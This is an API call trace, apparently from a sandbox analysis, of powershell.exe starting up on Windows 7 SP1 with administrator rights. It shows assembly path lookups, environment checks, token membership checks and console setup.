	[0276.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0276.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0277.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0277.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0278.076] CoTaskMemAlloc (cb=0x104) returned 0x2468a0
	[0278.076] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2468a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0278.076] CoTaskMemFree (pv=0x2468a0) 
	[0278.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cdb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0278.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cda50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0278.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cda50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0278.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cda50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0278.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1cda20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0278.665] SetErrorMode (uMode=0x1) returned 0x1
	[0278.665] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1cdca0 | out: lpFileInformation=0x1cdca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0278.666] SetErrorMode (uMode=0x1) returned 0x1
	[0282.216] CoTaskMemAlloc (cb=0x104) returned 0x2468a0
	[0282.216] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2468a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0282.216] CoTaskMemFree (pv=0x2468a0) 
	[0282.217] CoTaskMemAlloc (cb=0x104) returned 0x2468a0
	[0282.217] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2468a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0282.217] CoTaskMemFree (pv=0x2468a0) 
	[0282.217] CoTaskMemAlloc (cb=0x104) returned 0x2468a0
	[0282.218] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2468a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0282.218] CoTaskMemFree (pv=0x2468a0) 
	[0282.220] CoCreateGuid (in: pguid=0x1ce068 | out: pguid=0x1ce068*(Data1=0x2e2cad7b, Data2=0xf005, Data3=0x42ce, Data4=([0]=0xb9, [1]=0x4d, [2]=0x2f, [3]=0xf3, [4]=0x1e, [5]=0x93, [6]=0x98, [7]=0xe))) returned 0x0
	[0282.224] CoTaskMemAlloc (cb=0x104) returned 0x2468a0
	[0282.224] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2468a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0282.224] CoTaskMemFree (pv=0x2468a0) 
	[0282.227] CoTaskMemAlloc (cb=0x104) returned 0x2468a0
	[0282.227] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2468a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0282.227] CoTaskMemFree (pv=0x2468a0) 
	[0282.230] CoTaskMemAlloc (cb=0x104) returned 0x2468a0
	[0282.230] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2468a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0282.230] CoTaskMemFree (pv=0x2468a0) 
	[0282.236] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0283.038] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x1cdd10 | out: lpConsoleScreenBufferInfo=0x1cdd10) returned 1
	[0283.046] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0283.047] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x1cdd10 | out: lpConsoleScreenBufferInfo=0x1cdd10) returned 1
	[0283.048] GetVersionExW (in: lpVersionInformation=0x1cdca0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1cdca0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0283.052] GetCurrentProcess () returned 0xffffffffffffffff
	[0283.054] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1cdd38 | out: TokenHandle=0x1cdd38*=0x1cc) returned 1
	[0283.060] GetTokenInformation (in: TokenHandle=0x1cc, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1cdc58 | out: TokenInformation=0x0, ReturnLength=0x1cdc58) returned 0
	[0283.062] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2a0c20
	[0283.062] GetTokenInformation (in: TokenHandle=0x1cc, TokenInformationClass=0x8, TokenInformation=0x2a0c20, TokenInformationLength=0x4, ReturnLength=0x1cdc58 | out: TokenInformation=0x2a0c20, ReturnLength=0x1cdc58) returned 1
	[0283.063] DuplicateTokenEx (in: hExistingToken=0x1cc, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x1cddb8 | out: phNewToken=0x1cddb8*=0x1c4) returned 1
	[0283.063] GetTokenInformation (in: TokenHandle=0x1cc, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1cdc58 | out: TokenInformation=0x0, ReturnLength=0x1cdc58) returned 0
	[0283.063] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2a0c90
	[0283.063] GetTokenInformation (in: TokenHandle=0x1cc, TokenInformationClass=0x8, TokenInformation=0x2a0c90, TokenInformationLength=0x4, ReturnLength=0x1cdc58 | out: TokenInformation=0x2a0c90, ReturnLength=0x1cdc58) returned 1
	[0283.064] CheckTokenMembership (in: TokenHandle=0x1c4, SidToCheck=0x2daf038*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x1cddc8 | out: IsMember=0x1cddc8) returned 1
	[0283.064] CloseHandle (hObject=0x1c4) returned 1
	[0283.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0283.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0283.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0283.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0283.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0283.615] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0283.615] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0283.616] CoTaskMemAlloc (cb=0x804) returned 0x1b83c480
	[0283.616] GetConsoleTitleW (in: lpConsoleTitle=0x1b83c480, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0283.617] CoTaskMemFree (pv=0x1b83c480) 
	[0284.476] CoTaskMemAlloc (cb=0x804) returned 0x1b83cd30
	[0284.476] GetConsoleTitleW (in: lpConsoleTitle=0x1b83cd30, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0284.476] CoTaskMemFree (pv=0x1b83cd30) 
	[0284.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0284.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0284.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0284.479] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0284.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0284.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0284.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0284.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0285.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0285.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0285.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0285.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0285.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0285.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0285.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0285.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0285.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0285.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0286.372] SetConsoleCtrlHandler (HandlerRoutine=0x1d768dc, Add=1) returned 1
	[0287.141] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1c8
	[0287.142] CoCreateGuid (in: pguid=0x1cdeb0 | out: pguid=0x1cdeb0*(Data1=0x421a17cf, Data2=0x1305, Data3=0x4b89, Data4=([0]=0x81, [1]=0x30, [2]=0xb5, [3]=0x9c, [4]=0x3d, [5]=0xc8, [6]=0x5e, [7]=0xfe))) returned 0x0
	[0287.143] CoTaskMemAlloc (cb=0x104) returned 0x2468a0
	[0287.143] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2468a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0287.144] CoTaskMemFree (pv=0x2468a0) 
	[0287.151] WinSqmIsOptedIn () returned 0x0
	[0287.153] CoTaskMemAlloc (cb=0x104) returned 0x2468a0
	[0287.153] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2468a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0287.153] CoTaskMemFree (pv=0x2468a0) 
	[0287.155] CoTaskMemAlloc (cb=0x104) returned 0x2468a0
	[0287.155] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2468a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0287.155] CoTaskMemFree (pv=0x2468a0) 
	[0287.156] CoTaskMemAlloc (cb=0x104) returned 0x2468a0
	[0287.156] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2468a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0287.156] CoTaskMemFree (pv=0x2468a0) 
	[0287.158] CoTaskMemAlloc (cb=0x104) returned 0x2468a0
	[0287.158] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2468a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0287.158] CoTaskMemFree (pv=0x2468a0) 
	[0287.160] CoTaskMemAlloc (cb=0x104) returned 0x2468a0
	[0287.160] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2468a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0287.160] CoTaskMemFree (pv=0x2468a0) 
	[0287.164] CoTaskMemAlloc (cb=0x104) returned 0x2468a0
	[0287.164] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2468a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0287.164] CoTaskMemFree (pv=0x2468a0) 
	[0287.164] CoTaskMemAlloc (cb=0x104) returned 0x2468a0
	[0287.164] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2468a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0287.164] CoTaskMemFree (pv=0x2468a0) 
	[0287.165] CoTaskMemAlloc (cb=0x104) returned 0x2468a0
	[0287.165] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2468a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0287.165] CoTaskMemFree (pv=0x2468a0) 
	[0287.166] CoTaskMemAlloc (cb=0x104) returned 0x2468a0
	[0287.166] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2468a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0287.167] CoTaskMemFree (pv=0x2468a0) 
	[0287.170] CoTaskMemAlloc (cb=0x104) returned 0x2468a0
	[0287.170] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2468a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0287.170] CoTaskMemFree (pv=0x2468a0) 
	[0287.170] CoTaskMemAlloc (cb=0x104) returned 0x2468a0
	[0287.170] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2468a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0287.170] CoTaskMemFree (pv=0x2468a0) 
	[0287.171] CoTaskMemAlloc (cb=0x104) returned 0x2468a0
	[0287.171] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2468a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0287.171] CoTaskMemFree (pv=0x2468a0) 
	[0288.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
